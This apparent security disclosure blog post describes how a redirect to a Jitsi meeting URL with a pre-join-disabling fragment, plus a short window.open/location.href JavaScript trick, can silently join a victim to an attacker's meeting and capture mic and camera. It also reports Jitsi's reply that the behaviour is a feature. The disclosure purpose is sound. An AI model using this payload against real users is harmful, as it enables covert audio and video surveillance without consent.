Jitsi is an open-source web conferencing application. Jitsi also hosts a public instance, with millions of monthly active users.
Attack scenario
Let’s walk through an example. An attacker runs a meeting called `MiniGinger` on the public Jitsi instance meet.jit.si.
When a user visits the attacker controller webpage `CuteCats.com`, in the background they are redirected to:
https://meet.jit.si/MiniGinger#config.prejoinConfig.enabled=false
If the user visited any other Jitsi meeting before and allowed it to access the mic and camera, the attacker meeting will run in the background without any user interaction. In this way, it is possible to get voice and video footage without the user's permission. In my honest opinion, it seems more like a problem than a feature.
What's more, we can use a trick that will open the link in the background; the victim might not notice that something is running in the background. This code opens the new window with the current URL, while in the current window, which stays in the background, opens the Jitsi link.
window.open(location.href) location.href= ('https://meet.jit.si/MiniGinger#config.prejoinConfig.enabled=false')
Disclosure timeline
The article's purpose is to allow users to enhance their security. Jitsi claims that this is a feature and has no intention to fix it. I think, at the very least, they should remove it from the public instance, where the security risk is at its highest.
Message from Jitsi:
Hey @zimzi, That's a feature.
Please let me know in the comments below what you think about this feature!
Disclosure timeline: